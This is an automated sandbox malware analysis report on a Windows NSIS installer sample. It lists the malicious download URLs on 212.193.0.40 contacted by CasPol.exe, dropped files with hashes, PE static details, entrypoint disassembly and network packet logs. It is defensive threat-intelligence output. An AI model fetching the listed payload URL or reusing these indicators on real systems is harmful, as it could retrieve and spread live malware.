http://212.193.0.40/redi_oXifXcNSpB69.binn	CasPol.exe, 00000003.00000002.5715874012.00000000014D7000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.5718024276.0000000001541000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://212.193.0.40/redi_oXifXcNSpB69.bin~	CasPol.exe, 00000003.00000002.5718024276.0000000001541000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://212.193.0.40/redi_oXifXcNSpB69.binsvY	CasPol.exe, 00000003.00000002.5717397048.0000000001520000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://nsis.sf.net/NSIS_ErrorError	xKBLVUHoY6.exe	false		high
http://212.193.0.40/redi_oXifXcNSpB69.bing	CasPol.exe, 00000003.00000002.5715874012.00000000014D7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://212.193.0.40/redi_oXifXcNSpB69.binH	CasPol.exe, 00000003.00000002.5718024276.0000000001541000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://212.193.0.40/redi_oXifXcNSpB69.binoe	CasPol.exe, 00000003.00000002.5715874012.00000000014D7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://212.193.0.40/redi_oXifXcNSpB69.binZ	CasPol.exe, 00000003.00000002.5718024276.0000000001541000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://212.193.0.40/redi_oXifXcNSpB69.binalm	CasPol.exe, 00000003.00000002.5717397048.0000000001520000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
212.193.0.40	unknown	Russian Federation		49392	ASBAXETNRU	true

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	679245
Start date and time: 05/08/202214:04:09	2022-08-05 14:04:09 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	xKBLVUHoY6.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.troj.evad.winEXE@4/4@0/1
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 85.8% (good quality ratio 84.6%) Quality average: 87.5% Quality standard deviation: 21.4%
HCA Information:	Successful, ratio: 99% Number of executed functions: 49 Number of non-executed functions: 31
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.5.88, 20.93.58.141, 20.54.122.82
Excluded domains from analysis (whitelisted): evoke-windowsservices-tas-msedge-net.e-0009.e-msedge.net, wd-prod-cp-eu-north-3-fe.northeurope.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, e-0009.e-msedge.net, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, wdcpalt.microsoft.com, login.live.com, evoke-windowsservices-tas.msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, nexusrules.officeapps.live.com
Execution Graph export aborted for target CasPol.exe, PID 8740 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:07:08	API Interceptor	1x Sleep call for process: xKBLVUHoY6.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
212.193.0.40	DOC-827032878209209-6272828189.xlsx	Get hash	malicious	Browse	212.193.0.40/yweqUv.exe
	MNT-637272730027283-9372372002382.exe	Get hash	malicious	Browse	zangadosky.ddns.net:62099/
	SecuriteInfo.com.W32.AIDetectNet.01.15601.exe	Get hash	malicious	Browse	212.193.0.40/Onkbhpx_Tczszffh.jpg

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ASBAXETNRU	File.exe	Get hash	malicious	Browse	212.193.0.28
	kArTtIpAD6.exe	Get hash	malicious	Browse	212.193.0.28
	e733cbcaee33c4e99d99f2a3b82e2530e10dac7106edf.exe	Get hash	malicious	Browse	212.193.0.28
	aTlGCwT504.exe	Get hash	malicious	Browse	212.193.0.28
	a880ebe9be4e9888ac2faa331c390b5d477fc828bf2e6.exe	Get hash	malicious	Browse	212.193.0.28
	Nm0KQ1zXSJ.exe	Get hash	malicious	Browse	212.193.0.28
	CFCAB36F73560B2D15B6C266FEAAF0195A6E0D18C22AA.exe	Get hash	malicious	Browse	212.193.0.28
	bZRL42bYlO.exe	Get hash	malicious	Browse	212.193.0.28
	5E440E04F382464DB10245C9F730D64D839368EF763BB.exe	Get hash	malicious	Browse	212.193.0.28
	1FJJsXMkfH.exe	Get hash	malicious	Browse	212.193.0.28
	DOC-827032878209209-6272828189.xlsx	Get hash	malicious	Browse	212.193.0.40
	7K8mA51GO3	Get hash	malicious	Browse	212.196.181.163
	MNT-637272730027283-9372372002382.exe	Get hash	malicious	Browse	212.193.0.40
	onryo.arm7	Get hash	malicious	Browse	212.196.108.71
	8T1JPPrIEA	Get hash	malicious	Browse	212.196.181.198
	i586-20220723-1812	Get hash	malicious	Browse	46.29.162.4
	XjxxnV5YFc	Get hash	malicious	Browse	194.59.40.91
	SXTDYRut1n	Get hash	malicious	Browse	194.59.40.91
	7WNvIG6JvR	Get hash	malicious	Browse	194.59.40.91
	p4FVJFgyI4	Get hash	malicious	Browse	194.59.40.91

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll	S2Dh33wSH1.exe	Get hash	malicious	Browse
	95uskFzU1D.exe	Get hash	malicious	Browse
	mUWE7GHO2b.exe	Get hash	malicious	Browse
	wa2BtgcMxa.exe	Get hash	malicious	Browse
	xKBLVUHoY6.exe	Get hash	malicious	Browse
	S2Dh33wSH1.exe	Get hash	malicious	Browse
	95uskFzU1D.exe	Get hash	malicious	Browse
	mUWE7GHO2b.exe	Get hash	malicious	Browse
	wa2BtgcMxa.exe	Get hash	malicious	Browse
	NJid695aBy.exe	Get hash	malicious	Browse
	NJid695aBy.exe	Get hash	malicious	Browse
	Original Shipment_Document.PDF.exe	Get hash	malicious	Browse
	Original Shipment_Document.PDF.exe	Get hash	malicious	Browse
	bf.exe	Get hash	malicious	Browse
	bf.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe	Get hash	malicious	Browse
	hVAj77o331.exe	Get hash	malicious	Browse
	hVAj77o331.exe	Get hash	malicious	Browse
	invesssss.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\xKBLVUHoY6.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.814115788739565
Encrypted:	false
SSDEEP:	192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
MD5:	CFF85C549D536F651D4FB8387F1976F2
SHA1:	D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
SHA-256:	8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
SHA-512:	531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: S2Dh33wSH1.exe, Detection: malicious, Browse Filename: 95uskFzU1D.exe, Detection: malicious, Browse Filename: mUWE7GHO2b.exe, Detection: malicious, Browse Filename: wa2BtgcMxa.exe, Detection: malicious, Browse Filename: xKBLVUHoY6.exe, Detection: malicious, Browse Filename: S2Dh33wSH1.exe, Detection: malicious, Browse Filename: 95uskFzU1D.exe, Detection: malicious, Browse Filename: mUWE7GHO2b.exe, Detection: malicious, Browse Filename: wa2BtgcMxa.exe, Detection: malicious, Browse Filename: NJid695aBy.exe, Detection: malicious, Browse Filename: NJid695aBy.exe, Detection: malicious, Browse Filename: Original Shipment_Document.PDF.exe, Detection: malicious, Browse Filename: Original Shipment_Document.PDF.exe, Detection: malicious, Browse Filename: bf.exe, Detection: malicious, Browse Filename: bf.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, Detection: malicious, Browse Filename: hVAj77o331.exe, Detection: malicious, Browse Filename: hVAj77o331.exe, Detection: malicious, Browse Filename: invesssss.exe, Detection: malicious, Browse
Reputation:	high, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."..................@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially\Tygnings\systemless\Modregnings.Xen

Download File

Process:	C:\Users\user\Desktop\xKBLVUHoY6.exe
File Type:	data
Category:	dropped
Size (bytes):	89687
Entropy (8bit):	6.837509507259706
Encrypted:	false
SSDEEP:	1536:QmQLTEOmUbhvyoO0x5tFqfDDsVXK9cUcqU0C6Xi0PzBXbV8Km:NXUbhax0x5t8bDf9Mm3HJb7m
MD5:	D990EEF58440CBD9320E831F2634DA1A
SHA1:	A11659D9AF5DBA78D8255EDE08CF395EA15DDA17
SHA-256:	AB9CAE0313C6B603854407089A2680A956EBD8DDA95841FDAE71DB984FF665ED
SHA-512:	0D98927E56B9EF0C16EBB1BD075E3B3489CBD7AB3D9074B798D18969AEC044DE91663F607D4EB24F9B9789F04BA683BC779ECD6F94D75E09A354801AF4E30E1D
Malicious:	false
Reputation:	low
Preview:	1...%.y....Je.UP.......(.H..O..6o..j)..*p......8..F..C..2.U.\.S...[ju6...u..h<...o.B.91....;....a..w...q(.o0.y"x...&.......(...Y.$.Dp~....x..L.<.w..4..e.hae.....R...e..xW.2m<.......A(..Ddtm....j.]"%.wy...."A.U.I.`...w..Gu..^=q:.......m..t ...z.-e.P..._clf..W... v.?..#...C. .vMy......../\?.U...z.r.,B6 ...~.......i...@u..T..[...n2zA...)'S..3..P..4..A.n.$...`.>.......1...)5... -'xo..o^.c(........Z....50M.3\...`....`.-...q!.....?.H.'..E.....q..?p{.!.P.......kH,.k.j...!A....X7.^.@.X......sb.6...^.gv.(a..T..rl....Y....M.....RP.a..F.3...._....Q...=.....R...M6.8....r...f.<+..).....wV....1O.L.7iink..u$8....X.e.+..2.%....:..'...@..0....5].~.!...?..>o....~q.B.$..MJ.$H:..r;.......Ty.Z..?.?.E..O~Xh..p..'m..`.w....s..G...6.:...4.....F..~..1w@..M.k...?:)SS.[....s.G.>I,.....\|.....m..!M.I.x[.K..p.Q..Z..]N...Qd.......4/...,.%...:.`H.,T.J2...,:....Jg1...3~....!._v.Pa...../.......r.4k.i....vJ!.........Q56..4RU...z.j.x.....b..gDL9.n....o... .H.;F.y!V>..X...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially\Tygnings\systemless\battery-caution-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\xKBLVUHoY6.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1219
Entropy (8bit):	5.18916336052597
Encrypted:	false
SSDEEP:	24:t4CYMqjwbC4KyKbRAecFhBrNxrGDT/alXuprPQ5VIbIrGDRt:ojWCRNtAecFZwDT/AJsD7
MD5:	DE8960A1E15CF658A3FE4A2CAFDAA0D1
SHA1:	7EC7A95E4BC7BA19B3EC19366E87038C3902B430
SHA-256:	DF5925D3EC8C8EDD53FCEC6D7249888D9909B3D245E056028FD668DB4E23CB9B
SHA-512:	91D29A34227DD0DD672519999D32A68F8EB61A2A731495F1A5BCCCF18468BABE9FEA48F1A371A4C6C67D411C29B5ACBDA6430419924F2990DD004FF9564346A9
Malicious:	false
Reputation:	low
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path class="error" d="M5 12v1h2v-1z" fill="#c00"/><path d="M5.469.012c-.49 0-.796.215-1.032.455C4.202.707 4 1.023 4 1.497V2H2v14h5v-2H4V4h2V2.012h4V4h2v3h2V2h-2v-.395l-.002-.027a1.622 1.622 0 00-.416-1.014c-.236-.278-.62-.584-1.2-.552z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;white-space:normal;shape-padding:0;isolation:auto;mix-blend-mode:normal;solid-color:#000;solid-opacity:1;marker:none" color="#bebebe" font-weight="400" font-family="sans-serif" overflow="visible" fill="#2e3436"/><path class="warning" d="M8.875 8A.863.863 0 008 8.875v6.25c0 .492.383.875.875.875h6.25a.863.863 0 00.875-.875v-6.25A.863.863 0 0015.1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially\Tygnings\systemless\go-first-rtl.png

Download File

Process:	C:\Users\user\Desktop\xKBLVUHoY6.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	489
Entropy (8bit):	7.398446007013356
Encrypted:	false
SSDEEP:	12:6v/7Crv9JvDU9+7g+9reUl62vs3FsMjNwAAb88CGFwleELoyrIZLU4:JhY9r+9yr73FsMjqJw8/FwlP04IZLR
MD5:	4A3BBCDA1BE7D1AFEBECAD7904875C44
SHA1:	99273960EF8EFF8CCD701EC42963CAAFB7F87E4D
SHA-256:	B152B10AA3CA6BA1927C946E91FFF1A2FDFD9212D999EC93544F202089A67B48
SHA-512:	7D63ACC041656E77C263FA69D244E9B0DDD499192A3F7CD64F0BE3A8CE0F8A17C1703FA94F0B3D415058893AE9A5DAABA5D9664D3DFE15165FD50A2CB186DC66
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR................a....IDATx...E..P.E{#.H/ 8l.6333......#..,.C..?f.A.k?....X..fU..{..^....f.F....UD.q.....{.RQ...p...(r.....~T............Z....&IP._.~.dW .GN.9QS.&K..ppy.d.`f....E.....A.+..?)...}Gr.....6.8....I.X._..Y.......P...{..dj.I...3T..y..Ll...._.h..w..Z..W....9..b..z.)..OZ~..-.J....h<L..>A .]..3...7..j...$..Q..#.x....x....k.'.5..5....N*@v.6...gO@U....!....v.P..K...h..r.2<~..\|.o.h.,.v..~....@c.^..w.j..o4..#....n.E..2..`....B.,\.Qo....IEND.B`.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	6.819560838319919
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	xKBLVUHoY6.exe
File size:	314680
MD5:	6e0bf5d5220fbe4f7245653a259c7dad
SHA1:	f077644ac1eb17aa811f4805e1f5f546b4f6166f
SHA256:	2914eb3edbf9dadb98429173fb1c1b5954742b10e49b1f804024e6448028f73e
SHA512:	23c7a8aac36721080945d99eba09e0eeb29f20ac154ddbeb5b7584c9cb009189a51a7fe1b4effcb2f5dec5ee14faea9a429ca52c4f77d02add3e58871b252ad8
SSDEEP:	6144:nNeZ93O+c5v/vFGdRAiH+uZANZ8dZ4oacNtULM:nN37tyRApQ3dZ4DQZ
TLSH:	B7647D6226A6DC13E38457749165E73D8AA6FE861871C2332BF1ED9BB508F317C1C3A1
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................f...*.....

File Icon


Icon Hash:	e2aab6e6b696a6d2

Static PE Info

General

Entrypoint:	0x4034f7
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x614F9AE5 [Sat Sep 25 21:55:49 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	56a78d55f3f7af51443e58e0ce2fb5f6

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN="Inexcitable Spawners ", O=Tingibility, L=Hatzenport, S=Rheinland-Pfalz, C=DE
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	24/10/2021 22:57:56 23/10/2024 22:57:56
Subject Chain	CN="Inexcitable Spawners ", O=Tingibility, L=Hatzenport, S=Rheinland-Pfalz, C=DE
Version:	3
Thumbprint MD5:	D2B602699036F0C874A4C03B936AC7EF
Thumbprint SHA-1:	6EE012522EF3D0CADB102A8C014FDEE562F62E70
Thumbprint SHA-256:	ADCEA7C19DB10BA76E9CA9342B4AFB6B541167D4F98E6A1795B068A01F32138A
Serial:	56DD4BCCB18528A2

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007EFF1033089Ah
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007EFF1033086Ah
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [0042A2D8h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x50000	0x31a50	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x4af68	0x1dd0	.ndata
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6515	0x6600	False	0.6615349264705882	data	6.439707948554623	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x139a	0x1400	False	0.45	data	5.145774564074664	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20338	0x600	False	0.4993489583333333	data	4.013698650446401	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x25000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x50000	0x31a50	0x31c00	False	0.47981607255025127	data	6.055190439227351	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x50340	0x10a00	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x60d40	0x9600	data	English	United States
RT_ICON	0x6a340	0x8e00	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x73140	0x5600	data	English	United States
RT_ICON	0x78740	0x4400	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 252, next used block 1056964608	English	United States
RT_ICON	0x7cb40	0x2600	data	English	United States
RT_ICON	0x7f140	0x1200	data	English	United States
RT_ICON	0x80340	0xa00	data	English	United States
RT_ICON	0x80d40	0x600	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x81340	0x100	data	English	United States
RT_DIALOG	0x81440	0x11c	data	English	United States
RT_DIALOG	0x81560	0xc4	data	English	United States
RT_DIALOG	0x81628	0x60	data	English	United States
RT_GROUP_ICON	0x81688	0x84	data	English	United States
RT_MANIFEST	0x81710	0x33e	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 5, 2022 14:07:32.152435064 CEST	49727	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:07:33.159872055 CEST	49727	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:07:35.159363985 CEST	49727	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:07:39.174120903 CEST	49727	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:07:47.188000917 CEST	49727	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:07:54.218904018 CEST	49740	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:07:55.233010054 CEST	49740	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:07:57.232618093 CEST	49740	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:08:01.247330904 CEST	49740	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:08:09.261444092 CEST	49740	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:08:16.292191982 CEST	49760	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:08:17.306272030 CEST	49760	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:08:19.321695089 CEST	49760	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:08:23.336309910 CEST	49760	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:08:31.350100040 CEST	49760	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:08:38.382898092 CEST	49762	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:08:39.379566908 CEST	49762	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:08:41.394762993 CEST	49762	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:08:45.409439087 CEST	49762	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:08:53.423372030 CEST	49762	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:09:00.454098940 CEST	49765	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:09:01.468534946 CEST	49765	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:09:03.483611107 CEST	49765	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:09:07.498469114 CEST	49765	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:09:15.512239933 CEST	49765	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:09:22.543256998 CEST	49768	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:09:23.557393074 CEST	49768	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:09:25.572673082 CEST	49768	80	192.168.11.20	212.193.0.40
